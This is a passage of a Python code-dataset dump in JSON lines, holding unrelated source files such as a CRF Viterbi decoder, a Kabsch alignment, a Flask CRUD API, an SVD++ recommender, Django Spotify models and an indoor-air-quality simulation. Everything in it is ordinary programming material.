Variable(torch.LongTensor([seq_len]*batch_size))\n\t\tif self.opt.gpuid != -1:\n\t\t\talpha = alpha.cuda()\n\t\t\tlens = lens.cuda()\n\n\t\tc_lens = lens.clone()\n\n\t\tlogits_t = score.transpose(1, 0)\n\t\tfor logit in logits_t:\n\t\t\tlogit_exp = logit.unsqueeze(-1).expand(batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t *self.trans_weight.size())\n\t\t\talpha_exp = alpha.unsqueeze(1).expand(batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t *self.trans_weight.size())\n\t\t\ttrans_exp = self.trans_weight.unsqueeze(0).expand_as(alpha_exp)\n\t\t\tmat = trans_exp + alpha_exp + logit_exp\n\t\t\talpha_nxt = self.log_sum_exp(mat, 2).squeeze(-1)\n\n\t\t\tmask = (c_lens > 0).float().unsqueeze(-1).expand_as(alpha)\n\t\t\talpha = mask * alpha_nxt + (1 - mask) * alpha\n\t\t\tc_lens = c_lens - 1\n\n\t\talpha = alpha + self.trans_weight[self.eos_idx].unsqueeze(0).expand_as(alpha)\n\t\tnorm = self.log_sum_exp(alpha, 1).squeeze(-1)\n\n\t\treturn norm\n\n\t# viterbi decoding\n\t# \tinput y_score of shape (batch_l, source_l, num_label+2)\n\tdef viterbi_decode(self, y_score):\n\t\t# trim off the <box> and <eos>\n\t\ty_score = y_score[:, 1:-1, :]\n\t\tbatch_size, seq_len, n_labels = y_score.size()\n\t\tvit = y_score.data.new(batch_size, n_labels).fill_(-10000)\n\t\tvit[:, self.bos_idx] = 0\n\t\tvit = Variable(vit)\n\t\tlens = Variable(torch.LongTensor([seq_len]*batch_size))\n\t\tif self.opt.gpuid != -1:\n\t\t\tvit = vit.cuda()\n\t\t\tlens = lens.cuda()\n\n\t\tc_lens = lens.clone()\n\n\t\tlogits_t = y_score.transpose(1, 0)\n\t\tpointers = []\n\t\tfor logit in logits_t:\n\t\t\tvit_exp = vit.unsqueeze(1).expand(batch_size, n_labels, n_labels)\n\t\t\ttrn_exp = self.trans_weight.unsqueeze(0).expand_as(vit_exp)\n\t\t\tvit_trn_sum = vit_exp + trn_exp\n\t\t\tvt_max, vt_argmax = vit_trn_sum.max(2)\n\n\t\t\tvt_max = vt_max.squeeze(-1)\n\t\t\tvit_nxt = vt_max + logit\n\t\t\tpointers.append(vt_argmax.squeeze(-1).unsqueeze(0))\n\n\t\t\tmask = (c_lens > 0).float().unsqueeze(-1).expand_as(vit_nxt)\n\t\t\tvit = mask * vit_nxt + (1 - mask) * vit\n\n\t\t\tmask = (c_lens == 1).float().unsqueeze(-1).expand_as(vit_nxt)\n\t\t\tvit += mask * self.trans_weight[ self.eos_idx ].unsqueeze(0).expand_as(vit_nxt)\n\n\t\t\tc_lens = c_lens - 1\n\n\t\tpointers = torch.cat(pointers)\n\t\tscores, idx = vit.max(1)\n\t\tidx = idx.squeeze(-1)\n\t\tif len(idx.shape) == 0:\n\t\t\tidx = idx.view(1)\n\t\tpaths = [idx.unsqueeze(1)]\n\n\t\tfor argmax in reversed(pointers):\n\t\t\tidx_exp = idx.unsqueeze(-1)\n\t\t\tidx = torch.gather(argmax, 1, idx_exp)\n\t\t\tidx = idx.squeeze(-1)\n\n\t\t\tpaths.insert(0, idx.unsqueeze(1))\n\n\t\tpaths = torch.cat(paths[1:], 1)\n\t\tscores = scores.squeeze(-1)\n\n\t\t# reconcat\n\t\tbos = Variable(torch.LongTensor([self.bos_idx]*batch_size)).view(batch_size, 1)\n\t\teos = Variable(torch.LongTensor([self.eos_idx]*batch_size)).view(batch_size, 1)\n\t\tif self.opt.gpuid != -1:\n\t\t\tbos = bos.cuda()\n\t\t\teos = eos.cuda()\n\t\tpaths = torch.cat([bos, paths, eos], -1)\n\n\t\treturn scores, paths\n\n\n\tdef begin_pass(self):\n\t\tif self.trans_weight.initialized == 0:\n\t\t\tself.__init_trans()\n\t\t\tself.trans_weight.initialized = 1\n\t\t\n\n\tdef end_pass(self):\n\t\tpass\n\n\n\nif __name__ == '__main__':\n\topt = Holder()\n\tshared = Holder()\n\topt.gpuid = -1\n\topt.num_label = 5\n\tshared.batch_l = 1\n\tshared.source_l = 10\n\n\ty_score = Variable(torch.randn(shared.batch_l, shared.source_l, opt.num_label+2))\n\tcrf = CRF(opt, shared)\n\n\tz = crf(y_score)\n\tprint(z)\n\ty = 
crf.viterbi_decode(y_score)\n\tprint(y)","sub_path":"chunking/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"311431263","text":"def gcd(a, b):\n assert a >= 0 and b >= 0 and a + b > 0\n\n while a > 0 and b > 0:\n if a >= b:\n a = a % b\n else:\n b = b % a\n return max(a, b)\n\ndef extended_gcd(a, b):\n # returns (g, x, y) such that a * x + b * y = g = gcd(a, b)\n if b == 0:\n return (a, 1, 0)\n g, x, y = extended_gcd(b, a % b)\n return (g, y, x - (a // b) * y)\n\ndef diophantine(a, b, c):\n assert c % gcd(a, b) == 0\n # return (x, y) such that a * x + b * y = c\n g, x, y = extended_gcd(a, b)\n return (x * (c // g), y * (c // g))\n","sub_path":"Introduction_to_Discrete_Mathematics_for_Computer_Science_Specialization/Number_Theory_and_Cryptography/Diophantine_Equations.py","file_name":"Diophantine_Equations.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"333886850","text":"#Procrustes\n#Umeyama\n#Multiple View Geometry in Computer Vision (Second Edition)->78\n#Enhancing Projective Spatial Augmented Reality in Industry A Model Based Approach for Registration and Calibration-> 58\n#http://nghiaho.com/?page_id=671\n\n\nimport numpy as np\n\ndef kabsch(P, Q):\n \"\"\"\n Compute the optimal rigid transformation between two sets of points in 2D or 3D space using the Kabsch algorithm.\n \n Parameters:\n - P: A (N, D) array representing the first set of points, where N is the number of points and D is the number of dimensions (2 or 3).\n - Q: A (N, D) array representing the second set of points, where N is the number of points and D is the number of dimensions (2 or 3).\n \n Returns:\n - R: A (D, D) rotation matrix representing the optimal rotation.\n - t: A (D,) translation vector representing the optimal translation.\n \"\"\"\n # Center the points\n mean_P = np.mean(P, axis=0)\n mean_Q = np.mean(Q, axis=0)\n P_centered = P - mean_P\n Q_centered = Q - mean_Q\n \n # Compute the covariance matrix\n cov = P_centered.T @ Q_centered\n \n # Compute the singular value decomposition of the covariance matrix\n U, S, Vt = np.linalg.svd(cov)\n \n # Compute the optimal rotation\n D = np.eye(P.shape[1])\n if np.linalg.det(U) * np.linalg.det(Vt) < 0:\n D[-1, -1] = -1\n R = U @ D @ Vt\n \n # Compute the optimal translation\n t = mean_Q - R @ mean_P\n \n return R, t\n \n \n# Example usage\n\nimport numpy as np\n\n# Generate two sets of points\nnp.random.seed(0)\nP = np.random.rand(10, 2)\nQ = np.random.rand(10, 2)\n\n# Apply the Kabsch algorithm\nR, t = kabsch(P, Q)\n\n# Align the points\nQ_aligned = (Q - t) @ R\n\n# Compute the root mean square distance between the aligned points and the original points\nrmse = np.sqrt(np.mean((P - Q_aligned)**2))\nprint(\"RMSE:\", rmse) \n","sub_path":"scripts/shape_analysis/kabsch/kabsch_algorithm.py","file_name":"kabsch_algorithm.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"425062292","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\ndata = pd.read_csv('dataset.csv')\nabstracts = [BeautifulSoup(x).get_text() for x in data['abstract']]\n\ntfidf = TfidfVectorizer()\nX = tfidf.fit_transform(abstracts)\ny = data['type'].to_numpy()\n\nsupport_vec = svm.SVC(kernel='rbf', 
C=1000, gamma=0.001)\nrf = RandomForestClassifier(criterion='gini', max_features='sqrt', n_estimators=700)\nsgd = SGDClassifier(alpha=0.0001, fit_intercept=True, loss='modified_huber', penalty='l2')\npac = PassiveAggressiveClassifier(C=1.0, early_stopping=True, fit_intercept=True, max_iter=2000)\n\nsupport_vec.fit(X, y)\nrf.fit(X, y)\nsgd.fit(X, y)\npac.fit(X, y)\n\np_data = pd.read_csv('potentially_fake.tsv', sep='\\t')\np_abstracts = [BeautifulSoup(x).get_text() for x in p_data['abstract']]\nfake_indexes = []\nfor index in range(len(p_abstracts)):\n tfidf_pred = TfidfVectorizer(vocabulary=tfidf.vocabulary_)\n p_x = tfidf_pred.fit_transform([p_abstracts[index]])\n predictions = [support_vec.predict(p_x)[0], rf.predict(p_x)[0], sgd.predict(p_x)[0], pac.predict(p_x)[0]]\n # if there is a majority saying it is fake\n if predictions.count('fake') > 3:\n fake_indexes.append(index)\n print('Fake!')\n\np_data.loc[fake_indexes].to_csv('38_predicted_fake.csv')\n\n#-----------\n#-----------\n#-----------\n#-----------\n#-----------\n# get the terms and weights of those terms\nindex_value = {i[1]: i[0] for i in tfidf.vocabulary_.items()}\nfully_indexed = []\nfor row in X:\n fully_indexed.append({index_value[column]: value for (column, value) in zip(row.indices, row.data)})\n\ns_dic = {k: v for k, v in sorted(fully_indexed.items(), key=lambda item: item[1])}\n\nterms = {}\nfor d in fully_indexed:\n for k in d:\n if k in terms:\n terms[k].append(d[k])\n else:\n terms[k] = [d[k]]\n\n\ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n\n # use only topn items from vector\n sorted_items = sorted_items[:topn]\n\n score_vals = []\n feature_vals = []\n\n # word index and corresponding tf-idf score\n for idx, score in sorted_items:\n # keep track of feature name and its corresponding score\n score_vals.append(round(score, 3))\n feature_vals.append(feature_names[idx])\n\n # create a tuples of feature,score\n # results = zip(feature_vals,score_vals)\n results = {}\n for idx in range(len(feature_vals)):\n results[feature_vals[idx]] = score_vals[idx]\n\n return results\n\n\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\n\ntfidf_transformer = TfidfTransformer(smooth_idf=True, use_idf=True)\ntfidf_transformer.fit(X)\nterm_counts = {}\nfor abstract in abstracts:\n tf_idf_vector = tfidf_transformer.transform(tfidf.transform([abstract]))\n sorted_items = sort_coo(tf_idf_vector.tocoo())\n feature_names = tfidf.get_feature_names()\n keywords = extract_topn_from_vector(feature_names, sorted_items, 10)\n for k in keywords:\n if k in term_counts:\n term_counts[k] += keywords[k]\n else:\n term_counts[k] = keywords[k]\n\nsd = {k: v for k, v in sorted(term_counts.items(), key=lambda item: item[1])}\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"366546643","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom database import db, User, UserSchema\nimport os\n\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'crud.sqlite')\n# db.init_app(app)\n\nwith app.app_context():\n db.init_app(app)\n db.create_all()\n\n\nuser_schema = UserSchema()\nusers_schema = 
UserSchema(many=True)\n\n\n# endpoint to create new user\n@app.route(\"/user\", methods=[\"POST\"])\ndef add_user():\n request_dict = request.form\n name = request_dict[\"name\"]\n x = request_dict[\"x\"]\n y = request_dict[\"y\"]\n angle = request_dict[\"angle\"]\n\n new_user = User(name, x, y, angle)\n\n db.session.add(new_user)\n db.session.commit()\n\n # res = user_schema.dump(new_user)\n return user_schema.jsonify(new_user)\n\n\n# endpoint to show all users\n@app.route(\"/user\", methods=[\"GET\"])\ndef get_user():\n all_users = User.query.all()\n result = users_schema.dump(all_users)\n return jsonify(result.data)\n\n\n# endpoint to get user detail by id\n@app.route(\"/user/<id>\", methods=[\"GET\"])\ndef user_detail(id):\n user = User.query.get(id)\n return user_schema.jsonify(user)\n\n\n# endpoint to update user\n@app.route(\"/user/<id>\", methods=[\"PUT\"])\ndef user_update(id):\n user = User.query.get(id)\n request_dict = request.form\n name = request_dict['name']\n angle = request_dict['angle']\n\n user.name = name\n user.angle = angle\n\n db.session.commit()\n return user_schema.jsonify(user)\n\n\n# endpoint to delete user\n@app.route(\"/user/<id>\", methods=[\"DELETE\"])\ndef user_delete(id):\n user = User.query.get(id)\n db.session.delete(user)\n db.session.commit()\n\n return user_schema.jsonify(user)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='8000')\n","sub_path":"file1.py","file_name":"file1.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"2934645","text":"import random\nimport math\nimport collections\nimport datetime\nimport math\n\ndef get_user_brands(reco_file_path, end_date):\n '''Build the user-brand inverted table.'''\n beta = 0.5\n reco_file=open(reco_file_path,\"r\")\n reco_file.readline()\n brand_pref = collections.defaultdict(lambda :0)\n for line in reco_file:\n line = line.strip()\n user_name, brand_id, behavior_id, date_str = tuple(line.split(\",\"))\n\n cur_date = datetime.date(2013,\n int(date_str[0:date_str.find('月')]),\n int(date_str[date_str.find('月')+1:-1]))\n # popularity with time decay\n popularity = 1 / (1 + beta * (end_date - cur_date).days)\n brand_pref[brand_id] += popularity\n # print(brand_pref)\n\n pref_thres = 1.5\n # print(brand_pref)\n # brand_pref = {brand_id:pref for brand_id, pref in brand_pref.items() if pref > pref_thres }\n item_pool = [brand_id for brand_id, pref in brand_pref.items() if pref > pref_thres]\n\n reco_file=open(reco_file_path,\"r\")\n reco_file.readline()\n\n user_brands = collections.defaultdict(lambda :\n collections.defaultdict(lambda :0))\n # brand_users = collections.defaultdict(lambda :\n # collections.defaultdict(lambda :0))\n\n mu, record_time = 0, 0\n\n for line in reco_file:\n line = line.strip()\n user_name, brand_id, behavior_id, date_str = tuple(line.split(\",\"))\n\n # if behavior_id == '1' or behavior_id == '0':\n if behavior_id == '1':\n user_brands[user_name][brand_id] += 1\n mu += 1\n else:\n user_brands[user_name][brand_id] += 0\n mu += 0\n # brand_users[brand_id][user_name] += 1\n record_time += 1\n\n mu /= record_time\n\n # for user_name, brand_ids in user_brands.items():\n # print(user_name, brand_ids)\n\n return (user_brands, item_pool, mu)\n\n\ndef init_model(user_brands, K):\n '''Initialize the biased LFM (latent factor model) parameters.'''\n\n P = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in user_brands.keys()}\n bu = {key:0 for key in user_brands.keys()}\n\n brand_keys = set()\n for user_name, brand_id_dict in user_brands.items():\n for brand_id in 
brand_id_dict:\n brand_keys.add(brand_id)\n\n Q = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in brand_keys}\n bi = {key:0 for key in brand_keys}\n y = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in brand_keys}\n\n return (P, Q, bu, bi, y)\n\ndef preference(user, brand, history_brand, y, p, q, bu, bi, mu):\n '''Predicted preference of a user for a brand.'''\n pref = mu + bu[user] + bi[brand]\n \n nei_sum = p[user]\n for hist_brand in history_brand:  # distinct name so the brand argument is not shadowed\n nei_sum = [nei_sum[idx] + y[hist_brand][idx] for idx in range(0, len(p[user]))]\n pref += sum(q[brand][f]*nei_sum[f] for f in range(0, len(q[brand])))\n return pref \n\ndef select_samples(items, item_pool, ratio):\n '''Randomly sample negative examples.'''\n\n ret = {key:1 for key, buy_time in items.items() if buy_time >= 1}\n\n samples_size = ratio * len(ret)\n for i in range(0, int(len(ret) * ratio/2)):\n item = item_pool[random.randint(0,len(item_pool)-1)]\n if item in ret:\n continue\n ret[item] = 0\n if len(ret) > samples_size:\n break\n return ret\n\ndef svd_plus(user_brands, item_pool, ratio, K, mu, step_time, alpha, lamb):\n '''Train the latent factor model (SVD++).'''\n P, Q, bu, bi, y = init_model(user_brands, K)\n z = {}\n for step in range(0, step_time):\n print('training......', step)\n for user, brands in user_brands.items():\n z[user] = P[user]\n ru = 1 / math.sqrt(1.0 * len(brands))\n samples = select_samples(brands, item_pool, ratio)\n for item, rui in samples.items():\n z[user] = [z[user][idx] + y[item][idx]*rui for idx in range(0, K)]\n \n temp_sum = [0 for idx in range(0, K)]\n for item, rui in samples.items():\n eui = rui - preference(user, item, brands, y, P, Q, bu, bi, mu) \n bu[user] += alpha * (eui - lamb * bu[user])\n bi[item] += alpha * (eui - lamb * bi[item])\n for f in range(0, K):\n temp_sum[f] += Q[item][f] * eui * rui\n P[user][f] += alpha * (eui * Q[item][f] - lamb * P[user][f])\n Q[item][f] += alpha * (z[user][f] +\\\n eui * P[user][f] - lamb * Q[item][f])\n for item, rui in samples.items():\n y[item] = [y[item][idx] + alpha*(temp_sum[idx] - lamb * y[item][idx]) for idx in range(0, K)]  # element-wise update; += on a list would extend it\n\n alpha *= 0.9\n # print(Q['7868'])\n # normalization\n # for key, values in P.items():\n # m = math.sqrt(sum(value*value for value in values))\n # P[key] = [value/m for value in values]\n\n # for key, values in Q.items():\n # m = math.sqrt(sum(value*value for value in values))\n # Q[key] = [value/m for value in values]\n\n # print(Q['7868'])\n\n return (P, Q, bu, bi, y)\n\ndef recommend(user, history_brand, y, P, Q, bu, bi, mu):\n '''Score all brands for a user.'''\n\n rank = {brand:preference(user, brand, history_brand, y, P, Q, bu, bi, mu)\n for brand, q in Q.items()}\n\n return rank\n\n \nif __name__ == '__main__':\n\n ali_file_path = \"E:\作业汇总\学术会议及讲座\天池\data\\t_alibaba_data.csv\"\n data_file_path = \"E:\作业汇总\学术会议及讲座\天池\data\data_4_7_15.txt\"\n result_file_path = \"E:\作业汇总\学术会议及讲座\天池\\result\lfm_7_15.txt\"\n result_file = open(result_file_path, 'w')\n\n # data_file_path = \"Z:\CodeSpace\Python\天池\data\\test.txt\"\n\n ratio, K, step_time, alpha, lamb = 3, 10, 200, 0.02, 0.02\n\n user_brands, item_pool, mu\\\n = get_user_brands(data_file_path, datetime.date(2013, 7, 15))\n\n P, Q, bu, bi, y = svd_plus(user_brands, item_pool, ratio, K, mu, step_time, alpha, lamb)\n\n rank_thres = 0.7\n\n print(\"recommending...\")\n\n for user_name, brands in user_brands.items():\n rank = recommend(user_name, brands, y, P, Q, bu, bi, mu)\n \n rank = {brand:pref for brand, pref in rank.items() if pref > rank_thres}\n # print(rank)\n\n commit_brand = sorted(rank.items(), key=lambda d:d[1], reverse = True)[:10]\n # if 
len(commit_brand) > 1 and commit_brand[0][0] == '27791' and commit_brand[0][1] < 0.7:\n # commit_brand = commit_brand[1:11]\n # else:\n # commit_brand = commit_brand[:10]\n commit_brand = [brand for brand, pref in commit_brand]\n \n\n if len(commit_brand) < 1:\n continue\n\n result_file.write(user_name + '\\t' + ','.join(commit_brand) + '\\n')\n # print(sorted_rank[:10])\n","sub_path":"recommond/lfm/svd_plus.py","file_name":"svd_plus.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"413986421","text":"from django.db import models\nfrom rest_framework.exceptions import ( NotFound,)\n\nfrom ratebum.apps.core.models import TimestampedModel\nfrom ratebum.settings import spotify_api\nfrom .formatter import (\n format_spotify_artist,\n format_spotify_album,\n format_spotify_track,\n)\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Artist(TimestampedModel):\n name = models.CharField(max_length=100)\n spotify_id = models.CharField(max_length=500, unique=True)\n spotify_url = models.URLField(max_length=500)\n image_url = models.URLField(max_length=500)\n\n # genres separated by a comma (,)\n genres = models.CharField(max_length=500) \n\n followers = models.PositiveIntegerField()\n popularity = models.SmallIntegerField()\n\n def __str__(self):\n return self.name\n\nclass Album(TimestampedModel):\n name = models.CharField(max_length=80)\n spotify_id = models.CharField(max_length=500, unique=True)\n spotify_url = models.URLField(max_length=500)\n\n artist = models.ForeignKey(\n 'Artist',\n related_name='albums',\n on_delete=models.CASCADE\n )\n\n release_date = models.DateField()\n image_url = models.URLField(max_length=500)\n genres = models.CharField(max_length=500) \n total_tracks = models.SmallIntegerField()\n duration_ms = models.IntegerField()\n popularity = models.SmallIntegerField()\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.release_date.year)\n\nclass Track(models.Model):\n name = models.CharField(max_length=80)\n spotify_id = models.CharField(max_length=500, unique=True)\n preview_url = models.URLField(max_length=500, null=True)\n\n album = models.ForeignKey(\n 'Album',\n related_name='tracks',\n on_delete=models.CASCADE\n )\n\n duration_ms = models.IntegerField()\n track_number = models.SmallIntegerField()\n\n def __str__(self):\n return self.name\n\n\ndef get_music_model_instance(spotify_id, item_type):\n if item_type == 'artist':\n try:\n artist = Artist.objects.get(spotify_id=spotify_id)\n except Artist.DoesNotExist:\n artist = create_new_artist_from_spotify(spotify_id)\n return artist\n\n elif item_type == 'album':\n try:\n album = Album.objects.get(spotify_id=spotify_id)\n except Album.DoesNotExist:\n album = create_new_album_from_spotify(spotify_id)\n return album\n else:\n raise Exception('invalid type')\n\n\ndef create_new_artist_from_spotify(spotify_id):\n try:\n artist_from_spotify = spotify_api.get_artist(spotify_id)\n except:\n raise NotFound('Artist not found on Spotify database or Spotify API not avaliable')\n\n artist_data = format_spotify_artist(artist_from_spotify)\n artist = Artist.objects.create(**artist_data)\n return artist\n\n\ndef create_new_album_from_spotify(spotify_id):\n try:\n album_from_spotify = spotify_api.get_album(spotify_id)\n except:\n raise NotFound(\n 'Album not found on Spotify database or Spotify API not avaliable')\n\n artist_id = album_from_spotify['artists'][0]['id']\n try:\n artist = 
Artist.objects.get(spotify_id=artist_id)\n except Artist.DoesNotExist: \n album_artist = spotify_api.get_artist(artist_id)\n artist_data = format_spotify_artist(album_artist)\n artist = Artist.objects.create(**artist_data)\n\n album_data = format_spotify_album(album_from_spotify)\n tracks_list = album_data.pop('tracks')\n album = Album.objects.create(artist=artist, **album_data)\n\n for track in tracks_list:\n Track.objects.create(album=album, **track)\n \n return album\n","sub_path":"ratebum/apps/music/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"414829904","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/syn/dev/test/mogo62/mogo/mgof/templatetags/mgof.py\n# Compiled at: 2016-09-04 06:17:49\nfrom django import template\nfrom ..models import Topic\nregister = template.Library()\n\nclass LastPosts(template.Node):\n\n def __init__(self, num_posts=10):\n topics = Topic.objects.filter().select_related('forum').order_by('-last_post_date')[:num_posts]\n topics_ok = []\n for topic in topics:\n if topic.forum.is_public is True:\n topics_ok.append(topic)\n\n self.topics = topics_ok\n\n def render(self, context):\n context['topics'] = self.topics\n return ''\n\n\ndef forums_last_posts(parser, token):\n return LastPosts()\n\n\nregister.tag('forums_last_posts', forums_last_posts)","sub_path":"pycfiles/django-mgof-0.1.1.tar/mgof.py","file_name":"mgof.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"398553127","text":"# -*- coding: utf-8 -*-\n#quelques couleurs\nrouge_A='#C60C2E'\nvert1_A='#005157'\nvert2_A='#627D77'\nvert3_A='#9EB28F'\nvert4_A='#C5E5A4'\ngris1_A='#595A5C'\ncoule=[rouge_A,vert1_A,vert2_A,vert3_A,vert4_A,gris1_A]\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\n\n# governing equations as a reminder\n#Cp = C + dt*( tau*(Ce-C) -delta*C+ rho*S*L/V)\n#Lp = L + dt*( rho*V*C/S - rho*S*L/S )\ndef fc_IAQ_coupled(vec_CLp, vec_CL, tau,delta,dt,rho,S,V,Ce):\n\tC,L = vec_CL[0],vec_CL[1]\n\tCp,Lp = vec_CLp[0],vec_CLp[1]\n\tC_term = -Cp + C + 0.5*dt*( tau*(Ce-C) -delta*C+ rho*S*L/V) + 0.5*dt*( tau*(Ce-Cp) -delta*Cp+ rho*S*Lp/V)\n\tL_term = -Lp + L + 0.5*dt*( delta*V*C/S - rho*S*L/S ) + 0.5*dt*( delta*V*Cp/S - rho*S*Lp/S )\n\treturn [C_term,L_term]\n\n# enclosure\nL,l,h=5,5,3# dimensions\nS=2*( L*l+l*h+ h*L) # m2\nV=L*l*h # m3 \ntau=0.1# vol/h\nqv=V*tau#m3/h\ntau=qv/V\n\nCinit=20\nLinit=100\nCe_base=20\ndelta=0.15#\t1/h\nrho_base=0.5 # initial efficiency\n\nC,L=Cinit,Linit\nconcentration,deposition,time=[],[],[]\nrhoC,deltaC=[],[]\nrhop=[]\n\nnb_period=2\nperiod=24\ndt=0.1 #h\nsim_time=nb_period*24 # hour\nt=0 # hour\n\nwhile t < sim_time:\n\tCe=Ce_base + 5*(np.cos(t*2*np.pi/period))\n\trho=rho_base*abs(np.sin(t*2*np.pi/period))\n\tC_plus,L_plus=fsolve(fc_IAQ_coupled, [C,L], args=([C,L],tau,delta,dt,rho,S,V,Ce))\n\tC,L=C_plus,L_plus\n\tt+=dt\n\tconcentration.append(C)\n\tdeposition.append(L)\n\ttime.append(t)\n\trhop.append(rho)\n\trhoC.append(rho*S*L/V)\n\tdeltaC.append(delta*C)\n\t\n\t\nplt.subplot(121)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Concentration [µg/m$^3$]\")\nplt.plot(time, concentration, '-',color=coule[0], alpha=0.65,label='C')\n#plt.plot(time, rhop, '--',color=coule[1], 
alpha=0.65,label='rho')\nplt.legend()\n\nplt.subplot(122)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Mass on surfaces [µg/m$^2$]\")\nplt.plot(time, deposition, '-',color=coule[-1], alpha=0.65,label='L')\nplt.legend()\n\nplt.tight_layout()\n\n\nplt.clf()\nplt.subplot(121)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Resuspension rate [µg/m$^3$]\")\nplt.plot(time, rhop, '-',color=coule[0], alpha=0.65,label=r'$\\rho$')\nplt.legend()\n\nplt.subplot(122)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Transfer to air [µg/m$^{3}$] and surfaces [µg/m$^{2}$]\")\nplt.plot(time, rhoC, '--',color=coule[3], alpha=0.65,label=r'$ \\frac{\\rho L S}{V}$')\nplt.plot(time, deltaC, '-',color=coule[2], alpha=0.65,label=r'$\\delta C$')\nplt.legend()\n\nplt.tight_layout()\n","sub_path":"chapter_3/1_single_class_coupled_IAQ.py","file_name":"1_single_class_coupled_IAQ.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"585611692","text":"# print(\"Enter first number\")\n#\n# a = input()\n#\n# print(\"Enter second number\")\n#\n# b = input()\n#\n# print(\"Sum is:\", int(a)+int(b))\n\n# mystr = \"Harry is a good boy\"\n# #[0:] take the whole string length\n# #[:6] start from 0 to 6\n# print(len(mystr))\n# print(mystr[::-1])\n\n#List\n\nstudent = [\"Khalid\",\"Usman\",\"Ali\",\"Khan\",\"ikram\"]\n\n# student.sort()\n# student.reverse()\n# course =[]\n# # Append\n# course.append('English')\n# course.append('Urdu')\n# course.append('Dari')\n# course.append('computer')\n#\n# print(course)\n\n# student.insert(2,'imran')\n# student.remove('imran')\n# student.pop()\n# print(student)\n\n# tuple is immutedable\n# tpl = (1,2,3,4)\n# print(type(tpl))\n\n# nested list\n# n_list = [\"happy\",[2,0,1,4,5]]\n# # nested index\n# print(n_list[0][1])\n# print(n_list[1][3])\n\n# List Sliceing\n\n# name_list = [\"k\",'h','a','l','i','d']\n# print(name_list)\n# print(\"=====SLicing=======\")\n# # negative indexing\n#\n# # print(len(name_list))\n# #\n# # print(name_list[-6])\n#\n# print(name_list[2:5])\n#\n# print(name_list[-6])\n#\n# print(name_list[5:])\nnum_list = [1,3,9]\n\nnum_list[2:2]= [7,5]\n\nprint(num_list)\n\n\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"617284483","text":"visited = set()\ndef convert(array):\n for i in range(len(array) - 3):\n if (array[i] == array[i+1] and array[i] == array[i+2] and array[i] == array[i+3] and array[i] == 1):\n for t in range(len(array) - i):\n if (array[i+t] == 1):\n array[i+t] = 0\n else:\n break\n return array\ndef is_off(array):\n for i in array:\n if (i != 0):\n return False\n return True\ndef recur(array, steps):\n global visited\n next_array = []\n\n for arr in array:\n arr = convert(arr)\n if (tuple(arr) not in visited):\n visited.add(tuple(arr))\n if is_off(arr):\n return steps\n else:\n for i in range(len(arr)):\n if (arr[i] == 0):\n temp = list(arr)\n temp[i] = 1\n if (not(tuple(temp) in visited) and not(temp in next_array)):\n next_array.append(temp)\n\n return recur(next_array, steps + 1) \n\nn = int(input())\nlights = []\n\nfor i in range(n):\n lights.append(int(input()))\n \nprint(recur([lights], 0))","sub_path":"2011/CCC 2011 S5/S5.py","file_name":"S5.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"561620734","text":"'''\n@author Nicholas 
